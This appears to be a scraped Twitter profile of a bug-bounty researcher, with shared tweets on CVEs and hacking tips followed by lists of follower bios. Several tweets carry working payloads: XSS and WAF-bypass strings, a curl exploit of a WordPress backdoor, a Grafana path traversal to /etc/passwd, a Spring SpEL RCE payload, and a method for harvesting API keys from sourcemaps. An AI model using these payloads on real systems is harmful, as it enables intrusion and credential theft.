Abhishek Rautela @accesscheck
OSCP | Web Developer | Security Researcher | Noob | Blogger accesscheck.medium.com Hindistan Joined February 2021-
Tweets137
-
Followers72
-
Following150
-
Likes259
WAF bypasses XSS payload in JSON Payload: ["');alert('XSS');//"]@xyz.xxx #WAF #xss #BugBounty #BugBountytips
Need to make some quick $$? Here is a hack! No automated tools do either. 1) Find JavaScript files 2) ffuf -w js_files.txt -u FUZZ -mr "sourceMappingURL" 3) Download sourcemap 4)github.com/chbrown/unmap 5) Browse configs or just grep for API keys/Creds credit:@nullenc0de
OpenSSL 3.0.7 tarballs are posted here: openssl.org/source/openssl… It appears based on release notes that this is overblown. Would require a vulnerable TLS client to connect to a malicious server - more phishing-based attack versed remote RCE. #openssl
With reports of #Fortinet CVE-2022-40684 being exploited in the wild, we have detailed some early Indicators of Compromise in the following blog to help organizations assess their environments. horizon3.ai/fortinet-iocs-…
Master psychology and you can (damn-near) print money at will. Most people don't know how or where to start. These 12 TED Talks will teach you more about psychology than a four-year degree:
Today I got a notification on my phone that YouTube had sent me a copyright report, claiming one of my videos violated copyright and my channel was going to receive a strike. Except, my video didn't violate copyright. And YouTube didn't really send me a copyright report.
Here is my writeup about one of the web challenge named HORKOS in GoogleCTF 2022. The challenge is about insecure deserialization in JavaScript, the player need to find a way to run JS code in the sandbox by exploiting the vulnerability. blog.huli.tw/2022/07/11/en/…
Exploiting AWS IAM Authenticator by crafting malicious signed STS GetCallerIdentity request. 👉CVE-2022-2385 blog.lightspin.io/exploiting-eks…
CVE-2022-32275 Grafana 8.4.3 allows reading files via (for example) a /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd URI. cve.mitre.org/cgi-bin/cvenam…
#cycatz #bugbounty #bugbountytips Exploiting IRCTC along with few other government domains through XXE #RCE #XXE More..bit.ly/3wV0cra #appsec #infosec #pentest #appsec #ACL #Database #securitybreach #shodan #hacking
CVE-2022-1609 WordPress @momika233 Weblizar Backdoor $ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license' uid=33(www-data) gid=33(www-data) groups=33(www-data) #bugbounty #bugbountytips #nday
Atlassian Jira Seraph Authentication Bypass RCE CVE-2022-0540 raw.githubusercontent.com/Pear1y/CVE-202… #nday #bugbountytips #bugsbunny
Our technical analysis and POC for CVE-2022-22972 Authentication Bypass for #VMware Workspace ONE, vIDM, and vRealize Automation 7.6. horizon3.ai/vmware-authent… We've again passed our POC to @GreyNoiseIO to build early detections. #CyberSecurity
Want to do dir bruteforcing and parameter bruteforcing at the same time? GET ffuf -w "./dir.txt:DIR" -w ./params.txt -u https://EXAMPLE(.)COM/DIR?FUZZ=1 -t 300 -ac POST ffuf -w "./dir.txt:DIR" -w ./params.txt -u https://EXAMPLE(.)COM/DIR -X POST -d "FUZZ=1" -t 300 -ac
CVE-2022-22978 Spring Security RegexRequestMatcher Authorization Bypass EXP: %0d or %oa github.com/spring-project… nosec.org/m/share/5006.h…
Unsafe .Net Deserialization in Windows Event Viewer! This is a by-product of my research. Has confirmed with MSRC that this didn't cross any security boundary, but I guess it could still be another fun #LOLbas or Defender Bypass.😆
Multiple WAFs bypass that demonstrates various obfuscation techniques. <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
Spring Cloud Function Spel RCE aka CVE-2022-22963 POC. payload spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")
Spring4Shell Class Loader Manupilation Chain (tested on JDK 11.0.14, Tomcat 9.0.60, Spring Boot 2.6.5)
Fernandes @Fernandes163871
3 Followers 194 Following
Master_寒蝉 @Master_HanChan
2K Followers 724 Following 观看我的你,大概率就是在客户未购买任何设备的情况下,徒手分析全流量,并通过手按网线的方式进行分析,发现红队的各种0day漏洞,现场用客户现场办公机的txt手敲补丁,对当前在野攻击的四十多个0day漏洞全部完美封堵。同时根据网线中的信号发现RT的ip,手动分析的物理经纬度后,进行了反制RT,手撕Red Team的神吧🤯
Anshuman Srivastava @TweetAnshumaan
375 Followers 6K Following Networking + Cyber Security - Firewalls + Ethical Hacking & Penetration Testing Enthusiast
Ryan @GreaterGoodest
716 Followers 526 Following Blogging / tweeting about low level cyber security and red team tooling. Occasionally know what I'm talking about.
Ashutosh Dhasmana @nagcmd
8 Followers 347 Following
Sagar Kale @sgrkales
8 Followers 33 Following
Athesh Pargau R @athesh_pargau7
85 Followers 942 Following Human | CyberSec & Blockchain Nerd | Web3 & Crypto🚀 | Subscribe to my newsletter here! 👇
Prym S @yad_sab
208 Followers 5K Following #HINDUMORCHA #INDIA HINDU , HINDUTVA MEANS PEACE , HARMONY LOVE 💕 AND HAPPINESS , JAI SHREE RAM 🙏🙏 , JAI MATA DI , JAI BAJRANGBALI , JAI YOGI ,MODI , SHAH JI
CyberFacxts @CyberFacxts
1K Followers 4K Following Increasing your Security Awareness through daily Information Technology updates, news, tips, & tricks! Message me for consultation services.
Amanda Barbosa @codenameJudite
146 Followers 418 Following Offensive Security Engineer | also, on occasion, Judite
Ip_root @root_ip
4 Followers 226 Following
Gordon Davison @AlaskanAmbition
895 Followers 1K Following Ad Astra per Aspera - through difficulties to the stars , cybersecurity professional- governance & compliance , from down under to the last frontier
INFOSEC F0X 🔥 @infosec_fox
10K Followers 4K Following #CRISC | #CISA | #CISM | MSc #Cybersecurity | Digital #Transformation | Talk about #infosec & GRC | Wing Chun & Amateur Podcaster | Opinions are my own
junejr5377 @junejr5377
1 Followers 69 Following
بَيْرَق @typing0x
751 Followers 515 Following #eJPT #eCDFP #eWAPT #OSCP #CRTP Vulnerability researcher
Jérémy MIRRE @ifollownogod
454 Followers 5K Following French West Indies | Offensive Security @Verizon | Red Team, Purple & DevSecOps | Proud Staff @defcon11333
Fabio Caires @cairesmello
11 Followers 133 Following
Akash Singh @cryptobyte07
122 Followers 608 Following OSCP | Penetration Tester | CTF Player | Security engineer
Power of God @3uw1t
10 Followers 207 Following
G prashan1h @g_prashanth6
81 Followers 2K Following Views are my own and do not reflect those of my employer. #CyberSecurity, #InfoSec, #ThreatIntelligence, #ArtificialIntelligence,
Dany 🎀 @cybersecdancer
2K Followers 2K Following 🌸💖 Infosec Engineer | Tap Dancer | Masters in DFIR | Italian | Sec+ | CySA+|TikTok: infosecdany 💖🌸 | 📍 MA
Moataz El-Wardany @the_maestro_87
220 Followers 430 Following -= ɪ ᴀᴍ ᴛʜᴇ ᴏɴᴇ ᴄᴏɴꜱᴛᴀɴᴛ ɪɴ ᴀ ꜱᴇᴀ ᴏꜰ ᴠᴀʀɪᴀʙʟᴇꜱ =-
Aryan Rawat @aryannick9868
16 Followers 71 Following
BrainDrain @Bobeida
4 Followers 68 Following
Roselyn__ @itsRoselyn7
118 Followers 778 Following Hacker&Writer wannabe| Learner |Programmer | Music lover.
titomwenda @titokiki1
108 Followers 428 Following activist .UN intelligence officer.sniper from black jackthorn
Ruben Siuu @ru316
188 Followers 361 Following
0x90 Hey Eugene! @_HeyEug_
812 Followers 6K Following Il trucco, William Potter, è di non preoccuparsi che fa male.
Sharath Manuel @manuel_sharath
181 Followers 3K Following
Russ Bufalino @Fr33BSD55
1 Followers 2K Following “if you torture the data long enough, it will confess to anything” -Ronald H. Coase Weaponised Unreality Pronouns: vi/vim
John @jblack02019
0 Followers 45 Following
houssem @houssem97320436
135 Followers 3K Following 🪄Escape the matrix| 🔲 trader🔲 CyberSecurity Enthusiast🔲🌐
. @adrianoprocha
130 Followers 2K Following
William Nkum @KingWillie_18
125 Followers 343 Following Security Enthusiast, I Love God, Also #Arsenal Fan #NyameNeHene
Asad Jehangir @asadj04
51 Followers 774 Following
Vicky Chawla @VickyChawla6
198 Followers 3K Following
exploits.club @exploitsclub
2K Followers 110 Following A VR, RE, and Exploit Dev weekly newsletter | Join the club Contact: [email protected]
Stephen Fewer @stephenfewer
9K Followers 245 Following Senior Principal Security Researcher @rapid7. Decompiler @relyze. Core @metasploit dev 2009 - 2013. MSRC Top 100 2015. Pwn2Own 2011, 2021, 2024.
SinSinology @SinSinology
13K Followers 674 Following Pwn2Own 20{22,23,24,24.5,25,25.5}, i look for 0-Days but i find N-Days & i chase oranges 🍊
watchTowr @watchtowrcyber
9K Followers 13 Following watchTowr enables organizations to get ahead of in-the-wild exploitation with Preemptive Exposure Management technology.
ch @chybeta
14K Followers 4K Following open to bug bounty collaboration @HackenProof Security Researcher Just dm https://t.co/VVU1OV5yz6 业余打土狗
Hackmanac @H4ckmanac
89K Followers 367 Following We track verified, real-world cyber attacks to help you develop effective Cybersecurity strategies. Try https://t.co/eB7qgxKFAa, your Strategic Threat Intelligence platform
Netlas.io @Netlas_io
7K Followers 12 Following Stay ahead with updates on high-profile vulnerabilities, expert tutorials, essential safety tips, and the latest Netlas developments.
Vulmon Vulnerability ... @VulmonFeeds
4K Followers 2 Following Vulnerability Feed Bot (tweets new vulns) Follow @vulmoncom for human-controlled official account
FOFA @fofabot
12K Followers 191 Following Cybersecurity Search Engine Contact Email: [email protected] Telegram: https://t.co/E5EcKr5Kyl
Hunter @HunterMapping
23K Followers 184 Following Internet search engine for security researchers Contact Us: [email protected]
ZoomEye @zoomeye_team
9K Followers 508 Following A cyberspace search engine built for security researcher Daily Tricks || Latest Vulnerability Updates Email: [email protected] https://t.co/AUq5jNpKkl
Douglas McKee @fulmetalpackets
1K Followers 974 Following SANS SEC568 Author and Instructor | Cybersecurity Leader | Hacker | All tweets and opinions are my own. https://t.co/LwZZfzdZEQ
Curt Fielding @_CField
294 Followers 795 Following Vulnerability research/exploit dev. Search and Rescue. Mountain runner, skier, climber.
Ron Bowes (defunct) @iagox86
6K Followers 321 Following I don't use this account anymore, follow me under the same username on Bluesky or Mastodon (infosec dot exchange)
Caitlin Condon @catc0n
3K Followers 3K Following Adventurer. Takes a lot of photos, calls many places home. VP of research @VulnCheck. Former research director at @Rapid7 / @metasploit. Opinions mine. She/her.
ProjectDiscovery @pdiscoveryio
37K Followers 125 Following Detect real, exploitable vulnerabilities. Harness the power of Nuclei for fast and accurate findings without false positives.
Will Dormann is on Ma... @wdormann
26K Followers 1K Following I play with vulnerabilities and exploits. I used to be here on Twitter but now I'm here: @[email protected] https://t.co/hXggdAVkSQ
Horizon3.ai @Horizon3ai
2K Followers 256 Following Improve your security posture and reduce risk with the NodeZero® platform.
Anjali Prakash (She/H... @hsakarp_ilajna
2K Followers 1K Following CEHv12 (Practical) Certified || Bug Hunter || Post Graduate || Information Technology Engineer Graduate ||CyberSecurity Enthusiast|| Delhi University||
Christophe Tafani-Der... @christophetd
6K Followers 1K Following 302 Location: https://t.co/tP3JTD3HQp
Nuclei by ProjectDisc... @pdnuclei
36K Followers 184 Following Nuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
Elon Musk @elonmusk
225.3M Followers 1K Following
Ryan @GreaterGoodest
716 Followers 526 Following Blogging / tweeting about low level cyber security and red team tooling. Occasionally know what I'm talking about.
Horizon3 Attack Team @Horizon3Attack
12K Followers 56 Following @Horizon3ai Attack Team | Security Research | Exploit Dev | TTPs
Bishop Fox @bishopfox
26K Followers 4K Following A leading provider of #offensivesecurity solutions & contributor to the #infosec community. #pentesting #hacking VC @forgepointcap @carrickcapital @WestCap8
Trend Zero Day Initia... @thezdi
83K Followers 16 Following Trend Zero Day Initiative™ (ZDI) is a program designed to reward security researchers for responsibly disclosing vulnerabilities.
Synack Red Team @SynackRedTeam
48K Followers 622 Following The power behind the @Synack platform is an elite team of the world's top cybersecurity researchers. Our best are honored at https://t.co/6bEAyp7HWJ
Web Security Academy @WebSecAcademy
130K Followers 36 Following Free web security training from @PortSwigger
The Hacker News @TheHackersNews
932K Followers 2K Following The #1 trusted source for cybersecurity news, insights, and analysis — built for defenders and trusted by decision-makers.
Sophos X-Ops @SophosXOps
73K Followers 323 Following A task force composed of our SophosLabs, SecOps, and SophosAI teams working together towards one goal: protecting our customers.
Nmap Project @nmap
139K Followers 459 Following Free and open source tool for network discovery, admin, and security auditing. Our tweetmaster is Gordon "Fyodor" Lyon. We're also on FB: https://t.co/RVkxWNikvW
SANS Institute @SANSInstitute
191K Followers 417 Following SANS is the most trusted and by far the largest source for information & cyber security training, certification and research in the world.
OWASP® Foundation @owasp
213K Followers 532 Following We improve the security of apps with community-led open source projects, 260 local chapters, and tens of thousands of members worldwide. Famous for OWASP Top 10
m0rn1ngstr @m0rn1ngstr
344 Followers 125 Following | Netrunner | OSEP | OSCP | OSWP | CRTO | Security+ | Wanna make cyberspace a safer place | She/her
Ip_root @root_ip
4 Followers 226 Following
Gordon Davison @AlaskanAmbition
895 Followers 1K Following Ad Astra per Aspera - through difficulties to the stars , cybersecurity professional- governance & compliance , from down under to the last frontier
INFOSEC F0X 🔥 @infosec_fox
10K Followers 4K Following #CRISC | #CISA | #CISM | MSc #Cybersecurity | Digital #Transformation | Talk about #infosec & GRC | Wing Chun & Amateur Podcaster | Opinions are my own
Maril Vernon (Find me... @shewhohacks
10K Followers 376 Following “The One Woman Purple Team” Sr Sec Eng @ Aquia. Host of @TheCyberQueens Podcast. For help breaking in to #cybersecurity see @FearlessSec and @Maekshyft.
ᴅᴀɴɪᴇʟ ᴍɪ... @DanielMiessler
148K Followers 970 Following Building AI that upgrades humans and organizations. ʜᴜᴍᴀɴ 𝟤.𝟢 🟩🟩⬛️⬛️⬛️⬛️ ʜᴜᴍᴀɴ 𝟥.𝟢
Anonymous @YourAnonNews
7.7M Followers 860 Following We are Anonymous, we are legion, we do not forgive, we do not forget. Expect us. Here to counter propaganda and un-fuck your mind!
Stefan Rows 🧑🏼�... @StefanRows
10K Followers 528 Following 👨💻 Software Engineer turned Solopreneur | AI Wizard🧙 Building + teaching: https://t.co/lX8G1ht9pi | https://t.co/gbM90AkVMn | https://t.co/iwJSdWadV3 Code. Build. Teach.
. @cvltsie
8K Followers 528 FollowingTrends for United States
You might like
